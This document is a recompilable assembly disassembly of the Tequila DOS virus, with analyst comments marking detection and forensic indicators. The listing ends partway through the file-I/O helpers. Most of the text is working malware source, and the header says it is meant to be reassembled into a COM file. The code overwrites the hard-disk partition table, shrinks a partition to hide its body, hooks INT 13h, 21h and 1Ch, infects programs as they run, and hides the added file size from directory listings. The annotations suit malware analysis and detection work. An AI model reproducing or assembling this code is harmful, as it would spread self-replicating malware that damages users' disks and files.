;=============================
; the tequila virus =
; a recompilable =
; disassembly =
; specifically designed =
; for assembly to a COM file =
; with the A86 assembler. =
; ++++++++++++++++++ =
; If you desire a "perfect" =
; byte for byte source code =
;match-up, the MASM assembler=
; must be used and the noted =
;instructions must be changed=
; to comply with MASM syntax.=
; In addition, all byte and =
;word pointer references must=
; be changed from B and W to =
; BYTE POINTER and WORD =
; POINTER. =
;=============================
|
||
|
||
|
||
; Single-segment image: CS, DS, ES and SS are all assumed to address CODE_SEG.
; A86 reads a constant that starts with a 0 digit as hexadecimal, so "ORG 0100" is 100h.
CODE_SEG SEGMENT
|
||
ASSUME CS:CODE_SEG, DS:CODE_SEG, ES:CODE_SEG, SS:CODE_SEG
|
||
ORG 0100
|
||
TEQUILA PROC NEAR
|
||
|
||
JMP START  ; first instruction of the COM image: go to the booster stub at the end of the listing
|
||
|
||
; Parameter/state bytes. The routines below read and write this area through fixed
; offsets (W[0], W[2], W[4], W[6], W[8], B[0A], W[0B], W[0D], W[0F], B[011]).
; NOTE(review): the exact byte-to-offset mapping is not visible in this listing - confirm against a binary.
DB 000, 000, 000, 000, 000, 000, 000, 0FFH, 0FFH
|
||
DB 009, 005, 001H, 010H, 000, 000, 002H, 0FAH, 000, 00CH
|
||
|
||
; '$'-terminated text; presumably the string PRINT_MESSAGE prints with DOS function 09h (it loads DX=012h).
; Analyst note: these plain-text strings are present in the unencrypted image and are usable for string matching.
DB 00DH, 00AH, 00DH, 00AH
|
||
DB "Welcome to T.TEQUILA's latest production.", 00DH, 00AH
|
||
DB "Contact T.TEQUILA/P.o.Box 543/6312 St'hausen/"
|
||
DB "Switzerland.", 00DH, 00AH
|
||
DB "Loving thoughts to L.I.N.D.A", 00DH, 00AH, 00DH, 00AH
|
||
DB "BEER and TEQUILA forever !", 00DH, 00AH, 00DH, 00AH
|
||
DB "$"
|
||
|
||
; 45-character prompt; presumably the 02Dh bytes that PROGRAM_TERMINATION_ROUTINE copies from offset 0BBh to video memory.
DB "Execute: mov ax, FE03 / int 21. Key to go on!"
|
||
|
||
|
||
; PROGRAM_TERMINATION_ROUTINE - display payload, called from SET_STACK when the hooked
; INT 21h request is AH=4Ch (program exit).
; Saves AX,BX,CX,DX,SI,DI,ES,DS and BP, reserves 0Ch bytes of locals below BP, sets DS=CS.
; The state words W[6]/W[8] (written by INFECT_PARTITION_TABLE from the DOS date call) gate the display.
; Observable behaviour when it fires: direct writes to text-mode video memory, then a blocking key wait.
; NOTE(review): the numeric JE/JNE/JMP/LOOP targets are raw addresses kept from the disassembly, so
; the branch descriptions below are inferred from instruction order - confirm against a binary.
PROGRAM_TERMINATION_ROUTINE:
|
||
PUSH BP
|
||
MOV BP,SP
|
||
SUB SP,0CH  ; locals at [BP-2] .. [BP-0C]
|
||
PUSH AX
|
||
PUSH BX
|
||
PUSH CX
|
||
PUSH DX
|
||
PUSH SI
|
||
PUSH DI
|
||
PUSH ES
|
||
PUSH DS
|
||
PUSH CS
|
||
POP DS  ; DS = CS
|
||
MOV AX,W[6]  ; state word
|
||
INC AX  ; ZF set when W[6] was 0FFFFh
|
||
JE 0243H ;Masm Mod. Needed
|
||
DEC AX  ; ZF set when W[6] was 0
|
||
JNE 020DH ;Masm Mod. Needed
|
||
DEC W[8] ;Masm Mod. Needed
|
||
JNE 0243H ;Masm Mod. Needed
|
||
JMP 0246H ;Masm Mod. Needed
|
||
MOV AH,02AH  ; DOS Get Date: CX=year, DH=month, DL=day
|
||
CALL INT_21
|
||
MOV SI,CX  ; keep current year
|
||
MOV CX,W[8]  ; stored word (DX of the date call made at infection time)
|
||
CMP CL,DL  ; stored day vs. current day
|
||
JNE 022FH ;Masm Mod. Needed
|
||
MOV AX,SI
|
||
SUB AX,W[6]  ; current year - stored year
|
||
MUL B[011H] ;Masm Mod. Needed
|
||
ADD AL,DH  ; + current month
|
||
ADD CH,3  ; stored month + 3
|
||
CMP AL,CH
|
||
JAE 0237H ;Masm Mod. Needed
|
||
MOV W[6],0FFFFH ;Masm Mod. Needed
|
||
JMP 0243H ;Masm Mod. Needed
|
||
MOV W[6],0 ;Masm Mod. Needed
|
||
MOV W[8],3 ;Masm Mod. Needed
|
||
JMP 02DF ;Masm Mod. Needed
|
||
MOV BX,0B800H  ; colour text-mode video segment
|
||
INT 011  ; BIOS equipment list in AX
|
||
AND AX,030H  ; isolate initial-video-mode bits
|
||
CMP AX,030H  ; 11b = monochrome adapter
|
||
JNE 0256H ;Masm Mod. Needed
|
||
MOV BX,0B000H  ; monochrome text-mode video segment
|
||
MOV ES,BX  ; ES = video segment
|
||
XOR BX,BX  ; BX = offset of the next screen cell
|
||
MOV DI,0FD8FH  ; starting value, stepped by 34h below
|
||
MOV SI,0FC18H  ; starting value, stepped by 12h below
|
||
MOV W[BP-2],SI
|
||
MOV W[BP-4],DI
|
||
MOV CX,01E  ; at most 1Eh passes per cell
|
||
; Per-cell loop: squares both locals, compares the 32-bit sum against a bound, then updates the locals.
; NOTE(review): the shape resembles a fixed-point escape-time (Mandelbrot-style) iteration - confirm.
MOV AX,W[BP-2]
|
||
IMUL AX
|
||
MOV W[BP-8],AX
|
||
MOV W[BP-6],DX
|
||
MOV AX,W[BP-4]
|
||
IMUL AX
|
||
MOV W[BP-0C],AX
|
||
MOV W[BP-0A],DX
|
||
ADD AX,W[BP-8]
|
||
ADC DX,W[BP-6]
|
||
CMP DX,0F  ; bound check on the high word of the sum
|
||
JAE 02B0 ;Masm Mod. Needed
|
||
MOV AX,W[BP-2]
|
||
IMUL W[BP-4]
|
||
IDIV W[0F] ;Masm Mod. Needed
|
||
ADD AX,DI
|
||
MOV W[BP-4],AX
|
||
MOV AX,W[BP-8]
|
||
MOV DX,W[BP-6]
|
||
SUB AX,W[BP-0C]
|
||
SBB DX,W[BP-0A]
|
||
IDIV W[0D] ;Masm Mod. Needed
|
||
ADD AX,SI
|
||
MOV W[BP-2],AX
|
||
LOOP 0269 ;Masm Mod. Needed
|
||
INC CX
|
||
SHR CL,1
|
||
MOV CH,CL  ; attribute byte derived from the remaining pass count
|
||
MOV CL,0DB  ; character byte 0DBh
|
||
ES MOV W[BX],CX ;Masm Mod. Needed
|
||
INC BX
|
||
INC BX  ; advance one character cell (character + attribute)
|
||
ADD SI,012
|
||
CMP SI,01B8
|
||
JL 0260 ;Masm Mod. Needed
|
||
ADD DI,034
|
||
CMP DI,02A3
|
||
JL 025D ;Masm Mod. Needed
|
||
XOR DI,DI  ; ES:DI = start of video memory
|
||
MOV SI,0BB  ; DS:SI = text at offset 0BBh
|
||
MOV CX,02D  ; 2Dh characters
|
||
CLD
|
||
MOVSB  ; copy one character ...
|
||
INC DI  ; ... and skip the attribute byte
|
||
LOOP 02D7 ;Masm Mod. Needed
|
||
XOR AX,AX
|
||
INT 016  ; AH=0: wait for a key press
|
||
POP DS
|
||
POP ES
|
||
POP DI
|
||
POP SI
|
||
POP DX
|
||
POP CX
|
||
POP BX
|
||
POP AX
|
||
MOV SP,BP  ; drop the locals
|
||
POP BP
|
||
RET
|
||
|
||
; PRINT_MESSAGE - prints the '$'-terminated string at CS:0012h with DOS function 09h.
; Called from the INT 21h hook for AX=0FE03h. Preserves DX and DS; AH is overwritten.
; The call goes through INT_21, i.e. the saved original handler, not the hooked vector.
PRINT_MESSAGE:
|
||
PUSH DX
|
||
PUSH DS
|
||
PUSH CS
|
||
POP DS  ; DS = CS so DS:DX addresses the string
|
||
MOV AH,9  ; DOS: print string
|
||
MOV DX,012  ; offset of the text
|
||
CALL INT_21
|
||
POP DS
|
||
POP DX
|
||
RET
|
||
|
||
; NEW_PARTITION_TABLE - boot-time loader code. It addresses its own data at 07C30h/07C32h,
; so it is written to run at 0:7C00h; presumably this is the 34h-byte region that
; INFECT_PARTITION_TABLE copies from offset 01F6h into the sector it writes at
; cylinder 0 / head 0 / sector 1 of drive 80h - confirm offsets.
; Boot-time effects visible to an analyst:
;   - the BIOS base-memory word at 0:0413h is reduced by 3 (KB)
;   - five sectors are read to offset 0 of the segment at the new top of memory
;   - control passes to offset 022Ah of that segment (second stage below)
NEW_PARTITION_TABLE:
|
||
CLI
|
||
XOR BX,BX
|
||
MOV DS,BX  ; DS = 0
|
||
MOV SS,BX
|
||
MOV SP,07C00  ; stack just below the boot sector
|
||
STI
|
||
XOR DI,DI
|
||
SUB W[0413],3 ;Masm Mod. Needed
|
||
INT 012  ; AX = base memory size in KB (now 3 less)
|
||
MOV CL,6
|
||
SHL AX,CL  ; KB -> segment (x 40h)
|
||
MOV ES,AX  ; ES = segment of the reserved area
|
||
PUSH ES
|
||
MOV AX,022A
|
||
PUSH AX  ; far return address ES:022Ah
|
||
MOV AX,0205  ; INT 13h: read 5 sectors to ES:BX (BX = 0)
|
||
MOV CX,W[07C30]  ; stored cylinder/sector word
|
||
INC CX  ; start one sector after the stored location
|
||
MOV DX,W[07C32]  ; stored head/drive word
|
||
INT 013
|
||
RETF  ; continue at ES:022Ah
|
||
|
||
||
|
||
||
; Data words inside the loader. The first word is 0FE02h; INFECT_PARTITION_TABLE tests for
; that value at sector offset 2Eh, so this is presumably the "already infected" marker.
; NOTE(review): the next two words are presumably the W[0226]/W[0228] slots - confirm.
DB 002, 0FE
|
||
DB 04C, 0E9
|
||
DB 080, 004
|
||
|
||
||
|
||
||
; Second stage, running from the reserved segment.
PUSH CS
|
||
POP DS
|
||
XOR AX,AX
|
||
MOV ES,AX
|
||
MOV BX,07C00
|
||
PUSH ES
|
||
PUSH BX  ; far return address 0:7C00h
|
||
MOV AX,0201  ; INT 13h: read 1 sector to 0:7C00h
|
||
MOV CX,W[0226]  ; location saved by INFECT_PARTITION_TABLE
|
||
MOV DX,W[0228]
|
||
INT 013
|
||
PUSH CS
|
||
POP ES
|
||
CLD
|
||
MOV SI,0409
|
||
MOV DI,09BE
|
||
MOV CX,046
|
||
REP MOVSB  ; copy 46h bytes from 0409h to 09BEh (09BEh is later installed as the INT 13h entry)
|
||
MOV SI,091B
|
||
MOV DI,0A04
|
||
MOV CX,045
|
||
REP MOVSB  ; copy 45h bytes from 091Bh to 0A04h (0A04h is called by COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE)
|
||
CLI
|
||
XOR AX,AX
|
||
MOV ES,AX
|
||
ES LES BX,[070] ;Masm Mod. Needed
|
||
MOV W[09B0],BX ;Masm Mod. Needed
|
||
MOV W[09B2],ES ;Masm Mod. Needed
|
||
MOV ES,AX
|
||
ES LES BX,[084] ;Masm Mod. Needed
|
||
MOV W[09B4],BX ;Masm Mod. Needed
|
||
MOV W[09B6],ES ;Masm Mod. Needed
|
||
MOV ES,AX
|
||
; 0:0070h is the INT 1Ch (timer tick) vector and 0:0084h the INT 21h vector; both old values
; were saved above. Only INT 1Ch is redirected here, to offset 044Fh of this segment.
ES MOV W[070],044F ;Masm Mod. Needed
|
||
ES MOV W[072],DS ;Masm Mod. Needed
|
||
STI
|
||
RETF  ; run the sector just loaded at 0:7C00h
|
||
|
||
; INSTALL - start-up path (START jumps here in this booster build).
; Computes its own load offset, relocates the stored host CS/SS words by the PSP segment,
; performs the residency check, optionally copies itself to the top of the program's memory
; block and calls INFECT_PARTITION_TABLE, then hands control to the host entry point.
; Residency check seen by a monitor: INT 21h with AX=0FE02h, expecting AX=01FDh back.
; Note that this path does not hook any interrupt permanently; hooks are installed at boot.
INSTALL:
|
||
CALL NEXT_LINE
|
||
NEXT_LINE:
|
||
POP SI  ; SI = run-time address of NEXT_LINE
|
||
SUB SI,028F  ; SI = run-time address of offset 0 of the body
|
||
PUSH SI
|
||
PUSH AX
|
||
PUSH ES
|
||
PUSH CS
|
||
POP DS
|
||
MOV AX,ES  ; presumably the PSP segment at program entry - confirm
|
||
ADD W[SI+2],AX  ; relocate stored host CS
|
||
ADD W[SI+4],AX  ; relocate stored host SS
|
||
DEC AX
|
||
MOV ES,AX  ; ES = paragraph before the PSP (memory control block)
|
||
MOV AX,0FE02
|
||
INT 021  ; residency check
|
||
CMP AX,01FD  ; the resident hook answers with NOT 0FE02h
|
||
JE NO_PARTITION_INFECTION
|
||
ES CMP B[0],05A ;Masm Mod. Needed
|
||
JNE NO_PARTITION_INFECTION
|
||
ES CMP W[3],0BB ;Masm Mod. Needed
|
||
JBE NO_PARTITION_INFECTION
|
||
ES MOV AX,W[012] ;Masm Mod. Needed
|
||
SUB AX,0BB  ; 0BBh paragraphs below the segment just read
|
||
MOV ES,AX
|
||
XOR DI,DI
|
||
MOV CX,09A4  ; body length in bytes
|
||
CLD
|
||
REP MOVSB  ; copy the body to ES:0
|
||
PUSH ES
|
||
POP DS  ; DS = segment of the copy
|
||
CALL INFECT_PARTITION_TABLE
|
||
NO_PARTITION_INFECTION:
|
||
POP ES
|
||
POP AX
|
||
PUSH ES
|
||
POP DS  ; DS = ES as at entry
|
||
POP SI
|
||
CS MOV SS,W[SI+4] ;Masm Mod. Needed
|
||
CHAIN_TO_THE_HOST_FILE:
|
||
CS JMP D[SI] ;Masm Mod. Needed
|
||
|
||
; INFECT_PARTITION_TABLE - modifies the first sector of drive 80h.
; Sequence visible in the code:
;   1. stores the DOS date in W[6]/W[8]
;   2. saves the INT 13h vector, installs NEW_INTERRUPT_ONE on INT 01h and sets the trap flag
;      while one sector read runs through the INT 13h pointer
;   3. reads cylinder 0 / head 0 / sector 1 into the buffer at 09A4h
;   4. exits if the word at buffer offset 2Eh is already 0FE02h
;   5. looks for a partition entry of type 4, 6 or 1 and requires more than 6 in its end-sector field
;   6. writes the original sector and five further sectors near the end of that partition and
;      shrinks the entry's end sector and sector count by 6
;   7. overlays 34h bytes of loader code on the buffer and writes it back to sector 1
; Forensic indicators: word 0FE02h at offset 2Eh of the first sector; a partition entry whose
; end sector / size no longer match the file system's own geometry.
; NOTE(review): numeric jump targets and "JMP RET" forms are kept from the disassembly.
INFECT_PARTITION_TABLE:
|
||
MOV AH,02A  ; DOS Get Date: CX=year, DH=month, DL=day
|
||
INT 021
|
||
MOV W[6],CX ;Masm Mod. Needed
|
||
MOV W[8],DX ;Masm Mod. Needed
|
||
MOV AH,052  ; DOS: get list-of-lists pointer in ES:BX
|
||
INT 021
|
||
ES MOV AX,W[BX-2] ;Masm Mod. Needed
|
||
; NOTE(review): 03E8h looks like the immediate operand of the CMP in NEW_INTERRUPT_ONE,
; i.e. this store patches that comparison at run time - confirm against a binary.
MOV W[03E8],AX ;Masm Mod. Needed
|
||
MOV AX,03513  ; get INT 13h vector
|
||
INT 021
|
||
MOV W[09A0],BX ;Masm Mod. Needed
|
||
MOV W[09A2],ES ;Masm Mod. Needed
|
||
MOV AX,03501  ; get INT 01h (single-step) vector
|
||
INT 021
|
||
MOV SI,BX  ; keep old INT 01h offset
|
||
MOV DI,ES  ; keep old INT 01h segment
|
||
MOV AX,02501  ; set INT 01h to DS:03DAh
|
||
MOV DX,03DA
|
||
INT 021
|
||
MOV B[0A],0 ;Masm Mod. Needed
|
||
PUSHF
|
||
POP AX
|
||
OR AX,0100  ; set the trap flag
|
||
PUSH AX
|
||
POPF
|
||
MOV AX,0201  ; INT 13h: read 1 sector
|
||
MOV BX,09A4  ; buffer
|
||
MOV CX,1  ; cylinder 0, sector 1
|
||
MOV DX,080  ; head 0, drive 80h
|
||
PUSH DS
|
||
POP ES
|
||
PUSHF
|
||
CALL D[09A0] ;Masm Mod. Needed
|
||
PUSHF
|
||
POP AX
|
||
AND AX,0FEFF  ; clear the trap flag
|
||
PUSH AX
|
||
POPF
|
||
PUSHF  ; keep the read's carry flag across the next DOS call
|
||
MOV AX,02501  ; restore the old INT 01h vector
|
||
MOV DX,SI
|
||
MOV DS,DI
|
||
INT 021
|
||
POPF
|
||
JAE 0450 ;Masm Mod. Needed
|
||
JMP RET ;Masm Mod. Needed
|
||
PUSH ES
|
||
POP DS
|
||
CMP W[BX+02E],0FE02  ; marker test at sector offset 2Eh
|
||
JNE 045C ;Masm Mod. Needed
|
||
JMP RET ;Masm Mod. Needed
|
||
ADD BX,01BE  ; first partition table entry
|
||
MOV CX,4  ; four entries
|
||
MOV AL,B[BX+4]  ; partition type byte
|
||
CMP AL,4
|
||
JE 0479 ;Masm Mod. Needed
|
||
CMP AL,6
|
||
JE 0479 ;Masm Mod. Needed
|
||
CMP AL,1
|
||
JE 0479 ;Masm Mod. Needed
|
||
ADD BX,010  ; next entry
|
||
LOOP 0463 ;Masm Mod. Needed
|
||
JMP SHORT RET ;Masm Mod. Needed
|
||
MOV DL,080
|
||
MOV DH,B[BX+5]  ; entry's end head
|
||
MOV W[0228],DX ;Masm Mod. Needed
|
||
MOV AX,W[BX+6]  ; entry's end sector/cylinder word
|
||
MOV CX,AX
|
||
MOV SI,6
|
||
AND AX,03F  ; sector number bits
|
||
CMP AX,SI
|
||
JBE RET ;Masm Mod. Needed
|
||
SUB CX,SI  ; end sector - 6
|
||
MOV DI,BX  ; DI = partition entry
|
||
INC CX
|
||
MOV W[0226],CX ;Masm Mod. Needed
|
||
MOV AX,0301  ; INT 13h: write 1 sector (the sector just read)
|
||
MOV BX,09A4
|
||
PUSHF
|
||
CALL D[09A0] ;Masm Mod. Needed
|
||
JB RET ;Masm Mod. Needed
|
||
DEC CX
|
||
MOV W[DI+6],CX  ; new end sector in the buffered entry
|
||
INC CX
|
||
SUB W[DI+0C],SI  ; sector count - 6 (low word)
|
||
SBB W[DI+0E],0  ; borrow into the high word
|
||
MOV AX,0305  ; INT 13h: write 5 sectors from ES:0
|
||
MOV BX,0
|
||
INC CX
|
||
PUSHF
|
||
CALL D[09A0] ;Masm Mod. Needed
|
||
JB RET ;Masm Mod. Needed
|
||
MOV SI,01F6
|
||
MOV DI,09A4
|
||
MOV CX,034
|
||
CLD
|
||
REP MOVSB  ; overlay 34h bytes on the start of the buffered sector
|
||
MOV AX,0301  ; INT 13h: write 1 sector
|
||
MOV BX,09A4
|
||
MOV CX,1  ; cylinder 0, sector 1
|
||
XOR DH,DH  ; head 0
|
||
PUSHF
|
||
CALL D[09A0] ;Masm Mod. Needed
|
||
RET
|
||
|
||
; NEW_INTERRUPT_ONE - temporary INT 01h (single-step) handler installed by
; INFECT_PARTITION_TABLE while the trap flag is set.
; Stack on entry after PUSH BP: [BP+2]=interrupted IP, [BP+4]=interrupted CS, [BP+6]=flags.
; When the interrupted CS is not above the compared value, the interrupted CS:IP is recorded
; in 09A0h/09A2h (the pointer later used for all INT 13h calls) and B[0A] is set to 1.
; NOTE(review): the 09B4h immediate is presumably overwritten at run time by the store to
; W[03E8] in INFECT_PARTITION_TABLE - confirm. Jump targets are raw disassembly addresses.
NEW_INTERRUPT_ONE:
|
||
PUSH BP
|
||
MOV BP,SP
|
||
CS CMP B[0A],1 ;Masm Mod. Needed
|
||
JE 0506 ;Masm Mod. Needed
|
||
CMP W[BP+4],09B4  ; interrupted CS vs. threshold
|
||
JA 050B ;Masm Mod. Needed
|
||
PUSH AX
|
||
PUSH ES
|
||
LES AX,[BP+2]  ; ES:AX = interrupted CS:IP
|
||
CS MOV W[09A0],AX ;Masm Mod. Needed
|
||
CS MOV W[09A2],ES ;Masm Mod. Needed
|
||
CS MOV B[0A],1  ; done flag
|
||
POP ES
|
||
POP AX
|
||
AND W[BP+6],0FEFF  ; clear the trap flag in the saved flags
|
||
POP BP
|
||
IRET
|
||
|
||
; NEW_INTERRUPT_13 - disk-level stealth filter.
; Only requests with CX=0001h (cylinder 0, sector 1), DX=0080h (head 0, drive 80h) and
; AH=2 (read) or AH=3 (write) are handled here; everything else is passed to the saved handler.
; For a matching request the first sector is served from the location saved in W[0226]/W[0228]
; instead, so a resident copy shows the saved original sector to any tool reading through INT 13h.
; Defender takeaway: inspect sector 1 after a clean boot or via direct controller access.
; NOTE(review): numeric jump targets are raw disassembly addresses.
NEW_INTERRUPT_13:
|
||
CMP CX,1
|
||
JNE 054E ;Masm Mod. Needed
|
||
CMP DX,080
|
||
JNE 054E ;Masm Mod. Needed
|
||
CMP AH,3
|
||
JA 054E ;Masm Mod. Needed
|
||
CMP AH,2
|
||
JB 054E ;Masm Mod. Needed
|
||
PUSH CX
|
||
PUSH DX
|
||
DEC AL  ; sectors beyond the first
|
||
JE 0537 ;Masm Mod. Needed
|
||
PUSH AX
|
||
PUSH BX
|
||
ADD BX,0200  ; buffer position of the second sector
|
||
INC CX  ; start at sector 2
|
||
PUSHF
|
||
CS CALL D[09A0] ;Masm Mod. Needed
|
||
POP BX
|
||
POP AX
|
||
MOV AL,1  ; one sector
|
||
CS MOV CX,W[0226] ;Masm Mod. Needed
|
||
CS MOV DX,W[0228] ;Masm Mod. Needed
|
||
PUSHF
|
||
CS CALL D[09A0] ;Masm Mod. Needed
|
||
POP DX
|
||
POP CX
|
||
RETF 2  ; return to the caller, keeping the flags from the last call
|
||
CS JMP D[09A0] ;Masm Mod. Needed
|
||
|
||
; NEW_TIMER_TICK_INTERRUPT - INT 1Ch handler used only during boot.
; On every tick it reads the INT 21h vector at 0:0084h. Once that vector has a segment not
; above 0800h and differs from the value saved at 09B4h/09B6h, the handler:
;   - records the new INT 21h vector in 09B4h/09B6h
;   - puts the saved INT 1Ch vector (09B0h/09B2h) back at 0:0070h
;   - saves the INT 13h vector (0:004Ch) in 09A0h/09A2h and points it at CS:09BEh
;   - points INT 21h (0:0084h) at CS:04B1h
; Memory-forensics indicators: INT 13h and INT 21h vectors pointing into a segment just below
; the (reduced) top of base memory.
; NOTE(review): numeric jump targets are raw disassembly addresses.
NEW_TIMER_TICK_INTERRUPT:
|
||
PUSH AX
|
||
PUSH BX
|
||
PUSH ES
|
||
PUSH DS
|
||
XOR AX,AX
|
||
MOV ES,AX
|
||
PUSH CS
|
||
POP DS
|
||
ES LES BX,[084] ;Masm Mod. Needed
|
||
MOV AX,ES
|
||
CMP AX,0800
|
||
JA 05B0 ;Masm Mod. Needed
|
||
CMP AX,W[09B6]
|
||
JNE 0575 ;Masm Mod. Needed
|
||
CMP BX,W[09B4]
|
||
JE 05B0 ;Masm Mod. Needed
|
||
MOV W[09B4],BX ;Masm Mod. Needed
|
||
MOV W[09B6],ES ;Masm Mod. Needed
|
||
XOR AX,AX
|
||
MOV DS,AX  ; DS = 0 (interrupt vector table)
|
||
CS LES BX,[09B0] ;Masm Mod. Needed
|
||
MOV W[070],BX ;Masm Mod. Needed
|
||
MOV W[072],ES ;Masm Mod. Needed
|
||
LES BX,[04C] ;Masm Mod. Needed
|
||
CS MOV W[09A0],BX ;Masm Mod. Needed
|
||
CS MOV W[09A2],ES ;Masm Mod. Needed
|
||
MOV W[04C],09BE ;Masm Mod. Needed
|
||
MOV W[04E],CS ;Masm Mod. Needed
|
||
MOV W[084],04B1 ;Masm Mod. Needed
|
||
MOV W[086],CS ;Masm Mod. Needed
|
||
POP DS
|
||
POP ES
|
||
POP BX
|
||
POP AX
|
||
IRET
|
||
|
||
; INT_21_INTERCEPT - resident INT 21h filter. Dispatch by function number:
;   AH=11h/12h (FCB find first/next)     -> ADJUST_FCB_MATCHES, return to caller
;   AH=4Eh/4Fh (handle find first/next)  -> ADJUST_HANDLE_MATCHES, return to caller
;   AX=0FE02h                            -> residency check, returns AX=01FDh
;   AX=0FE03h                            -> prints the message if W[6] is 0, else chains
;   AX=4B00h (load and execute)          -> INFECT_THE_FILE on a private stack, then chains
;   AH=4Ch   (terminate)                 -> PROGRAM_TERMINATION_ROUTINE on a private stack, then chains
;   anything else                        -> chains to the saved handler
; Every chained call increments the counter at 09BCh.
; Detection note: the two AX=0FE0xh sub-functions are not DOS services; a reply of 01FDh to
; AX=0FE02h indicates this hook is resident.
INT_21_INTERCEPT:
|
||
CMP AH,011
|
||
JB CHECK_FOR_HANDLE
|
||
CMP AH,012
|
||
JA CHECK_FOR_HANDLE
|
||
CALL ADJUST_FCB_MATCHES
|
||
RETF 2  ; return with the flags set by the adjusted call
|
||
CHECK_FOR_HANDLE:
|
||
CMP AH,04E
|
||
JB CHECK_FOR_PREVIOUS_INSTALLATION
|
||
CMP AH,04F
|
||
JA CHECK_FOR_PREVIOUS_INSTALLATION
|
||
CALL ADJUST_HANDLE_MATCHES
|
||
RETF 2
|
||
CHECK_FOR_PREVIOUS_INSTALLATION:
|
||
CMP AX,0FE02
|
||
JNE CHECK_FOR_MESSAGE_PRINT
|
||
NOT AX  ; 0FE02h -> 01FDh
|
||
IRET
|
||
CHECK_FOR_MESSAGE_PRINT:
|
||
CMP AX,0FE03
|
||
JNE CHECK_FOR_EXECUTE
|
||
CS CMP W[6],0 ;Masm Mod. Needed
|
||
JNE CHAIN_TO_TRUE_INT_21
|
||
CALL PRINT_MESSAGE
|
||
IRET
|
||
CHECK_FOR_EXECUTE:
|
||
CMP AX,04B00
|
||
JE SET_STACK
|
||
CMP AH,04C
|
||
JNE CHAIN_TO_TRUE_INT_21
|
||
SET_STACK:
|
||
CS MOV W[09A6],SP ;Masm Mod. Needed
|
||
CS MOV W[09A8],SS ;Masm Mod. Needed
|
||
CLI
|
||
PUSH CS
|
||
POP SS
|
||
MOV SP,0AE5  ; private stack at CS:0AE5h
|
||
STI
|
||
CMP AH,04C
|
||
JNE TO_AN_INFECTION
|
||
CALL PROGRAM_TERMINATION_ROUTINE
|
||
JMP SHORT NO_INFECTION
|
||
TO_AN_INFECTION:
|
||
CALL INFECT_THE_FILE
|
||
NO_INFECTION:
|
||
CLI
|
||
CS MOV SS,W[09A8] ;Masm Mod. Needed
|
||
CS MOV SP,W[09A6] ;Masm Mod. Needed
|
||
STI
|
||
JMP SHORT CHAIN_TO_TRUE_INT_21
|
||
CHAIN_TO_TRUE_INT_21:
|
||
CS INC W[09BC] ;Masm Mod. Needed
|
||
CS JMP D[09B4] ;Masm Mod. Needed
|
||
|
||
; NEW_CRITICAL_ERROR_HANDLER - returns AL=3 and nothing else.
; INFECT_THE_FILE sets the INT 24h vector to offset 052Ah, presumably this handler, and
; restores it afterwards. A side effect for the user: no critical-error prompt appears for
; DOS calls made during that window (e.g. on a write-protected disk).
NEW_CRITICAL_ERROR_HANDLER:
|
||
MOV AL,3  ; action code: fail the call
|
||
IRET
|
||
|
||
; ADJUST_FCB_MATCHES - size stealth for FCB directory searches (INT 21h AH=11h/12h).
; Gets the DTA address, runs the caller's request through the saved handler, and if a match
; was returned (AL != 0FFh) checks the low five bits of the entry's time field.
; When those bits are all set (the marker INFECT_THE_FILE leaves in the file time), 09A4h is
; subtracted from the 32-bit size in the DTA, so the reported size equals the pre-infection size.
; An extended FCB (first DTA byte 0FFh) shifts the entry by 7 bytes.
; Returns with AX and flags as produced by the saved handler; BX and ES preserved.
; Detection note: a file time whose seconds field has all five bits set is not a value normal
; tools write, and the on-disk size differs by 09A4h bytes from what a resident copy reports.
ADJUST_FCB_MATCHES:
|
||
PUSH BX
|
||
PUSH ES
|
||
PUSH AX
|
||
MOV AH,02F  ; DOS: get DTA address in ES:BX
|
||
CALL INT_21
|
||
POP AX  ; original request
|
||
PUSHF
|
||
CS CALL D[09B4] ;Masm Mod. Needed
|
||
PUSHF
|
||
PUSH AX
|
||
CMP AL,0FF  ; no match returned
|
||
JE 0664 ;Masm Mod. Needed
|
||
ES CMP B[BX],0FF ;Masm Mod. Needed
|
||
JNE 064F ;Masm Mod. Needed
|
||
ADD BX,7  ; skip the extended-FCB prefix
|
||
ES MOV AL,B[BX+017] ;Masm Mod. Needed
|
||
AND AL,01F  ; low five bits of the time word
|
||
CMP AL,01F
|
||
JNE 0664 ;Masm Mod. Needed
|
||
ES SUB W[BX+01D],09A4 ;Masm Mod. Needed
|
||
ES SBB W[BX+01F],0 ;Masm Mod. Needed
|
||
POP AX
|
||
POPF
|
||
POP ES
|
||
POP BX
|
||
RET
|
||
|
||
; ADJUST_HANDLE_MATCHES - size stealth for handle-based directory searches (INT 21h AH=4Eh/4Fh).
; Same scheme as the FCB variant: run the request through the saved handler, and when it
; succeeded (carry clear) and the low five bits of the time byte at DTA+16h are all set,
; subtract 09A4h from the 32-bit size at DTA+1Ah.
; Returns with AX and flags as produced by the saved handler; BX and ES preserved.
; NOTE(review): numeric jump targets are raw disassembly addresses.
ADJUST_HANDLE_MATCHES:
|
||
PUSH BX
|
||
PUSH ES
|
||
PUSH AX
|
||
MOV AH,02F  ; DOS: get DTA address in ES:BX
|
||
CALL INT_21
|
||
POP AX  ; original request
|
||
PUSHF
|
||
CS CALL D[09B4] ;Masm Mod. Needed
|
||
PUSHF
|
||
PUSH AX
|
||
JB 0691 ;Masm Mod. Needed
|
||
ES MOV AL,B[BX+016] ;Masm Mod. Needed
|
||
AND AL,01F  ; low five bits of the time word
|
||
CMP AL,01F
|
||
JNE 0691 ;Masm Mod. Needed
|
||
ES SUB W[BX+01A],09A4 ;Masm Mod. Needed
|
||
ES SBB W[BX+01C],0 ;Masm Mod. Needed
|
||
POP AX
|
||
POPF
|
||
POP ES
|
||
POP BX
|
||
RET
|
||
|
||
; File I/O helpers. They fall through into one another and all end in INT_21, which calls the
; saved INT 21h handler directly (pointer at 09B4h) instead of issuing an INT instruction, so
; these requests do not pass through the hooked vector.
; NOTE(review): 069Ch and 06B4h are raw disassembly addresses; 06B4h is presumably the
; "load handle into BX" line just before INT_21 - confirm.

; WRITE_TO_THE_FILE - DOS function 40h (write); caller supplies CX/DX.
WRITE_TO_THE_FILE:
|
||
MOV AH,040
|
||
JMP 069C ;Masm Mod. Needed
|
||
|
||
||
; READ_FROM_THE_FILE - DOS function 3Fh (read). On success AX = bytes read - bytes requested,
; so a short read leaves a non-zero AX and a borrow in the flags.
READ_FROM_THE_FILE:
|
||
MOV AH,03F
|
||
CALL 06B4 ;Masm Mod. Needed
|
||
JB RET ;Masm Mod. Needed
|
||
SUB AX,CX
|
||
RET
|
||
|
||
||
; MOVE_TO_END_OF_FILE - DOS function 4202h with offset 0: returns the file length in DX:AX.
